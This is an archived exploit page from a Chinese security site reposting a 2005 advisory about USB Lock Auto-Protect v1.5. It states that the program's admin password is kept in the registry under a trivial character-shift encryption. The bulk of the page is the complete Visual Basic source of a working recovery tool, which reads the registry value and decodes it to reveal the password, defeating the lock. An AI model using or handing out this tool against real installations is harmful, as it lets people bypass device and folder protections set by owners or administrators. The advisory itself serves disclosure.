首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
USB Lock Auto-Protect Locally Stored Password Recovery
来源:secubox.teria.org 作者:fRoGGz 发布时间:2005-09-08  

USB Lock Auto-Protect Locally Stored Password Recovery

Summary
Prevent or allow the use of removable USB storage devices, CD-ROMs and floppy disks with USB Lock AP (Auto-Protect). The program also offers drag-and-drop folder protection without changing folder location. In addition it offers the ability to lock the PC and still be able to see screen contents. Its interface is protected by encrypted password and offers active protection working as a Windows service at the local system level making it suitable for both home and business use.

Due to the fact that the USB Lock uses a weak encryption algorithm to encrypt the password stored in the registry. It is possible to recover the password for bypass interface protection.

Credit:
The information has been provided by fRoGGz.
The original article can be found at: http://www.shadock.net/secubox/.data/adv_usblock/

Details
Exploit:
VERSION 5.00
Begin VB.Form Recovery
BackColor = &H00000000&
BorderStyle = 4
Caption = "USB Lock Auto-Protect Password Recovery"
ClientHeight = 855
ClientLeft = 45
ClientTop = 285
ClientWidth = 4350
ForeColor = &H00000000&
MaxButton = 0
MinButton = 0
PaletteMode = 1
ScaleHeight = 855
ScaleWidth = 4350
ShowInTaskbar = 0
StartUpPosition = 2
Begin VB.Label lcd
Alignment = 2
BackColor = &H00000000&
BeginProperty Font
Name = "Courier New"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0
Italic = 0
Strikethrough = 0
EndProperty
ForeColor = &H0080FF80&
Height = 615
Left = 120
TabIndex = 0
Top = 120
Width = 4095
End
End
Attribute VB_Name = "Recovery"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'#########################################

'USB Lock Auto-Protect v1.5 Local Password Encryption Weakness

'Discovered & Coded: fRoGGz
'Credits to: SecuBox Labs
'Web: secubox.teria.org

'Software:
'
'USB Lock Auto-Protect v1.5
'Vendor: www.advansysperu.com

'Background:
'
'Prevent or allow the use of removable USB storage devices, CD-ROMs and floppy disks
'with USB Lock AP (Auto-Protect). The program also offers drag-and-drop folder protection
'without changing folder location. In addition it offers the ability to lock the PC and
'still be able to see screen contents. Its interface is protected by encrypted password and
'offers active protection working as a Windows service at the local system level making it
'suitable for both home and business use.

'Vulnerability:
'
'The weakness is caused due to the use of a weak encryption algorithm to encrypt the password
'stored in the registry. It is possible to recover the password for bypass interface protection.

'#########################################

Option Explicit

Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" ( _
ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, _
ByVal samDesired As Long, phkResult As Long) As Long

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" ( _
ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, _
ByVal lpData As String, lpcbData As Long) As Long

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Dim i As Integer
Dim Decrypt As String

Private Sub Form_Load()
Dim Handle, Test As Long
Dim Crypt As String * 50

If RegOpenKeyEx(&H80000001, "Software\VB and VBA Program Settings\vbts\id", 0, &HF003F, Handle) = 0 Then
Test = RegQueryValueEx(Handle, "dll", 0, 1, Crypt, 50)
lcd = Crypt
RegCloseKey (Handle)

i = 1
If Len(lcd) <> 0 Then
Do While (i <= Len(lcd))
Decrypt = Decrypt & Chr(Asc(Mid(lcd, i, 1)) - 5)
i = i + 1
Loop
lcd = "Your decrypted password is:" & vbCrLf & vbCrLf & Decrypt
End If
Else
MsgBox "USB Lock Auto-Protect is not installed !", vbCritical, "Recovery Tool"
End
End If
End Sub



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZipTorrent Local Information D
·GNU Mailutils imap4d search Co
·Man2web CGI Command Execution
·Raxnet Cacti graph_image.php R
·CUPS Dot-Slash DoS
·Snort <= 2.4.0 SACK TCP Opt
·Microsoft Windows keybd_event
·COOL! Remote Control DoS
·MS05-018 windows CSRSS.EXE Sta
·Windows XP Firewall Bypassing
·P2P Pro Command DoS
·Mercury Mail Multiple Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved